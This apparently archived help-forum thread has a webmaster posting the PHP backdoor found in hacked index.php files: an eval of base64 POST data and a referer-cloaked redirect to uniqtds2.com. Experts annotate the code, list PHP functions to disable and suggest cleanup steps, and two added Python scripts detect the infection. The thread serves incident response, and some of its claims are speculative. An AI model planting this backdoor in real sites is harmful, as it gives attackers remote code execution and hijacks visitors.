Solved

Boards not loading properly after attack

Posted on 2009-05-15
902 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and several index.php pages were deleted and replaced with the hackers' own files. Now I have reversed the damage, but my boards are not loading properly. What can be going wrong? The rest of the site is running smoothly. This is the code the hackers had set in the (now deleted) index files:
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>


Question by:axtur
4 Comments
 
LVL 34

Expert Comment

by:Beverley Portlock
ID: 24399440
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files".
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
	$a = base64_decode($a);
	eval ($a);
}
function get_counter() {
	$ip = $_SERVER['REMOTE_ADDR'];
	$uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
	if ($uniq === false) {
		return false;
	}
	if ($uniq == "go") {
		return true;
	}
	return false;
}
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
?>


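As an added example (not code from the thread), here is a scanner that does the two checks suggested above in one pass: it walks the web root with dot-files included, so hidden .htaccess files are not skipped, and flags any file carrying the signatures of the injected index.php quoted in the question (the eval of a POST parameter, base64_decode, the sha1(md5()) tag, the uniqtds2.com callout, the HTTP_REFERER cloak) plus .htaccess directives that prepend or redirect to foreign code. The sample web root is constructed in a temporary directory; the paths and the auto_prepend_file line are assumptions for the demonstration. Note that the sha1(md5($a)) check in the backdoor is not authentication: anyone who has read the source can compute b from a.

```python
"""Added example, not from the original thread: walk a web root, dot-files
included, and report files that match the injected index.php's signatures.
The web root below is constructed in a temp dir purely for the demo."""
import os
import re
import tempfile

# Signatures taken from the injected code quoted in the question.
SIGNATURES = {
    "eval_of_post": re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
    "base64_eval": re.compile(r"base64_decode\s*\("),
    "weak_auth": re.compile(r"sha1\s*\(\s*md5\s*\("),
    "tds_callout": re.compile(r"uniqtds2\.com"),
    "referer_cloak": re.compile(r"HTTP_REFERER"),
}
# Directives a board's own .htaccess should not normally contain.
HTACCESS_SUSPECT = re.compile(
    r"(auto_prepend_file|auto_append_file|RewriteRule\s+\S+\s+https?://)", re.I)


def scan_file(path):
    """Return the list of signature names matched in one file (empty = clean)."""
    try:
        with open(path, "r", encoding="latin-1") as fh:
            data = fh.read()
    except OSError:
        return []
    hits = [name for name, rx in SIGNATURES.items() if rx.search(data)]
    if os.path.basename(path) == ".htaccess" and HTACCESS_SUSPECT.search(data):
        hits.append("htaccess_directive")
    return hits


def scan_webroot(root):
    """Map relative path -> hits for every file under root, dot-files included."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # os.walk lists dot-files; nothing is hidden from it
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


# Constructed sample: a clean index, a re-infected board index, a hidden .htaccess.
INFECTED = ('<?php $a=@$_POST["a"];if($a && @$_POST["b"]==sha1(md5($a)))'
            '{$a=base64_decode($a);eval($a);} ?>')


def build_sample_root():
    """Create the demo web root (assumed layout: /index.php and /boards/)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "boards"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php echo "hello"; ?>')
    with open(os.path.join(root, "boards", "index.php"), "w") as fh:
        fh.write(INFECTED)
    with open(os.path.join(root, "boards", ".htaccess"), "w") as fh:
        fh.write('php_value auto_prepend_file "/tmp/.x.php"\n')  # assumed hostile line
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_sample_root()).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against the real document root instead of the temp dir by passing that path to scan_webroot(); the referer_cloak and tds_callout patterns only fire on the full injected script, so a hit on weak_auth or eval_of_post alone still means the backdoor half of the payload is present.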
 
LVL 3

Accepted Solution

by:
markh789 earned 500 total points
ID: 24400929
The script is used as a DDoS spot.
Let me explain what they're doing: they have bots set to the page to open it, using a botnet. Not only will that cause too much traffic, it will also open http://uniqtds2.com/tds_u.php?dname=*var*, and that PHP script could be doing... anything. They also have a PHP eval() set up so they can run their own PHP commands. The bots may still be trying to access files. Check your Apache logs and see what files they're accessing; if it's a random file then use .htaccess to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make a profit off adverts by redirecting all your users to a porn website; I've seen this done before. Users will register, enter CC details, etc.; spam, money loss, you name it, they will do it. Although, since their bots are opening the advert around 10 times a second and they get 10 cents a click... they're using your website as a money-maker!

What I can recommend is to try to block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

Do this in your php.ini; if you're on a shared host, ask them to do it for you.

Disabling those functions will help block shells. If you want, you can also set display_errors to false in your php.ini.

Right now, you should be checking EVERY file, even .txt files, to see if any of the code is there; try uploading your board's upgrade files to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only about 20 bots, try blocking all the bots' IPs in .htaccess:
Order Allow,Deny
Allow from all
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
        // Decode base64 code
        $a = base64_decode($a);
        // Run the base64 code
        eval ($a);
}
function get_counter() {
        $ip = $_SERVER['REMOTE_ADDR'];
        // This could be where the ddos is coming from.
        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
        if ($uniq === false) {
                return false;
        }
        if ($uniq == "go") {
                return true;
        }
        return false;
}
// Grabs the referrer; it also checks for bot.htm in the referrer
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
// Checks to see if "yahoo" (but not "slurp") is in the referrer
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
?>


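The answer above says to check the Apache logs for what the bots are accessing. As an added example (not code from the thread), the script below triages an Apache combined-format access log for the two behaviours of the injected code that are visible from the server side: a visitor whose Referer names google or yahoo receiving a 302 (the cloak fired), and Referer-less POSTs to index.php (the backdoor's trigger; the a and b POST parameters themselves never appear in an access log, so the method, path and missing Referer are all there is to go on). It then renders the .htaccess Deny block suggested above for the noisiest offenders. The log lines are constructed with documentation-range IPs; the threshold of two alerts is an assumption.

```python
"""Added example, not from the original thread: triage an Apache combined
access log for the injected code's server-side traces and emit .htaccess
Deny lines. The log lines below are constructed for the demo."""
import re
from collections import Counter

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed sample log: two redirected search visitors, three backdoor POSTs,
# one ordinary visitor and one real crawler (which sends no Referer at all).
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2009:10:01:02 +0000] "GET /boards/index.php HTTP/1.1" 302 0 "http://www.google.com/search?q=forum" "Mozilla/5.0"
203.0.113.7 - - [15/May/2009:10:01:02 +0000] "GET /boards/index.php HTTP/1.1" 302 0 "http://www.google.com/search?q=forum" "Mozilla/5.0"
198.51.100.9 - - [15/May/2009:10:02:10 +0000] "POST /boards/index.php HTTP/1.1" 200 15 "-" "-"
198.51.100.9 - - [15/May/2009:10:02:11 +0000] "POST /index.php HTTP/1.1" 200 15 "-" "-"
198.51.100.9 - - [15/May/2009:10:02:12 +0000] "POST /boards/index.php HTTP/1.1" 200 15 "-" "-"
192.0.2.44 - - [15/May/2009:10:03:00 +0000] "GET /boards/index.php HTTP/1.1" 200 9123 "http://example.org/" "Mozilla/5.0"
66.249.66.1 - - [15/May/2009:10:04:00 +0000] "GET /boards/index.php HTTP/1.1" 200 9123 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
"""


def parse(log_text):
    """Yield one dict per parseable line; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text):
    """Return (alerts, per_ip): a list of (ip, reason) and an alert count per IP."""
    alerts = []
    per_ip = Counter()
    for rec in parse(log_text):
        ref = rec["referer"].lower()
        reason = None
        if rec["status"] == "302" and ("google" in ref or "yahoo" in ref):
            reason = "search-engine visitor redirected (TDS cloak fired)"
        elif (rec["method"] == "POST" and rec["path"].endswith("index.php")
              and rec["referer"] == "-"):
            reason = "referer-less POST to index.php (backdoor trigger candidate)"
        if reason:
            alerts.append((rec["ip"], reason))
            per_ip[rec["ip"]] += 1
    return alerts, per_ip


def deny_block(per_ip, threshold=2):
    """Render an Order Allow,Deny block for IPs with at least `threshold` alerts."""
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += [f"Deny from {ip}" for ip, n in sorted(per_ip.items()) if n >= threshold]
    return "\n".join(lines)


if __name__ == "__main__":
    found, counts = triage(SAMPLE_LOG)
    for ip, why in found:
        print(ip, "-", why)
    print(deny_block(counts))
```

Feed the real access_log into triage() instead of SAMPLE_LOG. The Googlebot line is deliberately left unflagged: the injected code keys on the Referer header, which crawlers do not send, so the cloak only ever hits humans arriving from a search results page.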
 

Author Comment

by:axtur
ID: 24406123
I have checked the code and I don't see anything strange in it. The only changed file (index.php) has been reversed; no other files have been found.

What can I do? How can I see the hidden files?
 
LVL 3

Expert Comment

by:markh789
ID: 24409564
file_get_contents could be used as a DDoS point, to download.
You can easily set bots to that page to tell the server to download the file as many times as they want.

If you can run shell commands, run this in the shell:
    ls -a /PATH/HERE

Replace /PATH/HERE with your public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did, you're fine from further attacks.

If you want DDoS protection on your server then look at what I found here:

Run this in the shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
apxs -i -a -c mod_evasive20.c

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change the values if needed (if you have root, that is).

If not, ask your host for better DDoS protection.
